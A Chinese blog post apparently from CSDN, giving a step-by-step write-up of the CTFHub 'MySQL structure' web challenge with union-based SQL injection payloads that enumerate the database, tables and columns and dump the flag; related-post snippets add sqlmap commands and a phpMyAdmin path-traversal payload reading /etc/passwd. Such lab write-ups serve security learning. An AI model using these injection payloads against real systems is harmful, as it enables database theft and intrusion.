CTFHub-web(MySQL结构)

最新推荐文章于 2024-08-13 21:45:57 发布
最新推荐文章于 2024-08-13 21:45:57 发布
阅读量3k 收藏 5
点赞数 4
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45254208/article/details/108155779
版权

1. 输入一个1,发现有两个注入点
在这里插入图片描述

2. 验证这两个注入点

0 union select 1,2

在这里插入图片描述

3. 从注入点得到数据库信息和数据库版本

0 union select database(),version()

在这里插入图片描述

4. 查询sqli数据库中的表

0 union select 1,group_concat(table_name) from 
	information_schema.tables where table_schema='sqli'

在这里插入图片描述
5. 查询表中的字段

0 union select 1,group_concat(column_name) from
	information_schema.columns where table_name='qvqmmbwmch'

在这里插入图片描述

6. 查询对应字段的值

0 union select 1,group_concat(aosteiqvkp) from qvqmmbwmch

在这里插入图片描述

hangshao0.0
关注
专栏目录
[GWCTF 2019] web题-我有一个数据库
BROTHERYY的博客
07-30 1791
复现环境:buuoj.cn 我是从题目猜到有phpmyadmin,直接就输入就进去了 看一下版本信息 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 能够执行,修改为flag flag{15aa1a13-8298-433c-8139-4ff6a0ffb5d6} ...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 838
CTFHUB SQL
CTFHub | MySQL结构
尼泊罗河伯的博客
11-13 1902
根据网页显示内容输入1进行测试,此题可能存在 SQL 注入。此题与前一题类似,这次使用手工注入。先判断是否存在注入,发现存在注入后检查注入点。判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看全部数据库名,并查看这些数据库的表名,最后在lvlbiqemvj 表中的数据发现此题 flag 。
CTFhub-web-信息泄露(超详细、新手推荐)
最新发布
test_zpx的博客
08-13 336
目录遍历是web中常见的基础操作,我们通常会通过目录的遍历来发现是否存在对我们有用的信息。
# CTFhub MySQL结构
plant1234的博客
06-18 738
MySQL结构: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata
CTFHub技能树之WEB MYSQL结构
weixin_48799157的博客
03-20 1432
小白一个,如有错误请指正! 解法一: 1.这里还是老方法,输入 1, 2 ,3 ,得知字段有两个 2.爆数据库 select * from news where id=123 union select 1,database()# 3.爆表名 select * from news where id=123 union select 1,group_concat(table_name) from information_schema.tables where table_schema..
CTFHUB-SQL注入-MySQL结构
u014794539的博客
07-10 489
考点 MySQL的数据库结构 数据库1 = 网站1 表明 列名 数据 数据库2 … 数据库3 … 分析过程 ?id=1 and 1=1 ?id=1 and 1=2 ?id=1' and1=1# 上句执行了下两句未执行 存在注入 查字段 1 order by 1 1 order by 2 1 order by 3 2执行 3不执行了 两个字段 查看当前数据库 233 union select 1,database() 库名还是sqli,看表 233 union select 1,grou
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7242
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1249
CTFHUB-WEB-SQL注入
ctfhub——web——sql注入(sqlmap实现)
weixin_43906500的博客
05-13 1746
本次sql注入全部基于sqlmap实现 1.整数型注入 题目如下,为整数型注入 1.1安装sqlmap sudo apt install sqlmap 1.2测试注入 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.com:10080/?id=1 成功注入 1.3查看数据库 执行命令 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.
初识CTF Day2 CTFHUB密码口令&SQL注入
suxinAL的博客
09-27 909
前言 接着上次的继续往下做 git泄露结束了,现在开始看svn和hg 正文 首先看一下信息泄露部分的svn和hg 这里使用到一个工具dvcs-ripper 下载地址如下 https://github.com/kost/dvcs-ripper.git (注意:该工具一定要配置环境,具体如下图,或者查看readme.md) 安装好工具就简单了,我是在kali虚拟机里进行使用的 具体指令如下 cd dvcs-ripper-master ./rip-svn.pl -v -u http://challenge-d
CTFHub-MYSQL结构-wp
z1moq的博客
05-16 212
MySQL结构 对注入条件进行测试 输入 1 时正常返回 输入 1’ 时无法正常返回 输入 1+1 时正常返回 id=2 的值 说明存在整数型SQL注入 使用 order by 检查字段数 字段数为 2 使用 1 union select 1,2,3 检查输出字段数 与order by 得出的结果相同 -1 union select 1,database() #得出表名:sqli -1 union select 1,group_concat(table_name) from informa
CTFHUB-技能树-Web题-SQL注入-Mysql结构
Static______的博客
04-04 888
3.除了y和n,还有两个特殊选项。一个是a,表示alway,就是总是获取。一个是q,表示退出。4.不想手动选择,则在执行sqlmap的时候,加上–batch和–smart选项。在使用sqlmap过程中,经常需要用户进行选择,如[Y/n]。1.大写的为默认选项。如果不输入,就自动使用该选项。得到两个表名,爆第一个表的字段名看看有什么信息。2.我们输入时,不用区分大小写。得到一个字段名,看看有什么数据。1 and 1=1 有回显。1 and 1=2 无回显。
CTFHub技能树web(持续更新)--SQL注入--MySQL结构
jiuyongpinyin的博客
09-05 875
MySQL结构 首先结果测试是可以使用联合查询语句的,前文中有提到过如何手工注入,这里就直接使用sqlmap进行注入 爆破当前数据库: 得到当前数据库: 爆破当前数据库的表名: 得到表名: 这里和之前不一样了,没有类似的flag的表名,但是有一个sappimemcd这个没见过的,爆破这个表名的列试试: 得到列名: 接着我们爆破里面的字段: 得到flag: 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Cookie注入
Static______的博客
04-05 741
这里其实可以将数据包放入重放器中进行。得到两个表名,查看第一个表的字段。输入1 and 1=1 有回显。输入1 and 1=2 无回显。由此判断可回显字段为1,2字段。
CTF】【ctfhubMysql流量
qq_43498726的博客
01-10 3169
【工具】wireshark 【知识储备】流量分析类的题目大多需要用到wireshark进行抓包分析 因为之前接触过wireshark,我直接用kali虚拟机中的wirshark进行此次实验,所以没有wireshark安装过程。 直接利用搜索功能进行流量字节字符串搜索“mysql”(本题就是关于mysql的题,还有一种tips就是ctfhub上面的flag都是以ctfhub开头,直接搜索“ctfhub”也可以) 如果搜索的时候mysql需要在mysql包中一个一个查找,能够找到一个含有flag的数据 复制
CTFhub mysql流量分析
luminous_you的博客
12-10 2277
mysql流量分析,因为是CTF题所以可以直接查找ctfhub得到答案 分析一下mysql数据包中做了什么操作吧 两次登陆失败,一次成功 然后query了 version database table 查询【ctfhub也出现在这个数据包中k】 删除操作 mysql contains “admin” 为什么要在这里设置flag 这篇文章提供了思考,就是这里是攻击者的ip https://mp.weixin.qq.com/s/5YFdZCrCZ_qvP9oLCeXVyA ...
CTFHub
weixin_57455077的博客
05-03 242
判断注入点判断字段数判断回显点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值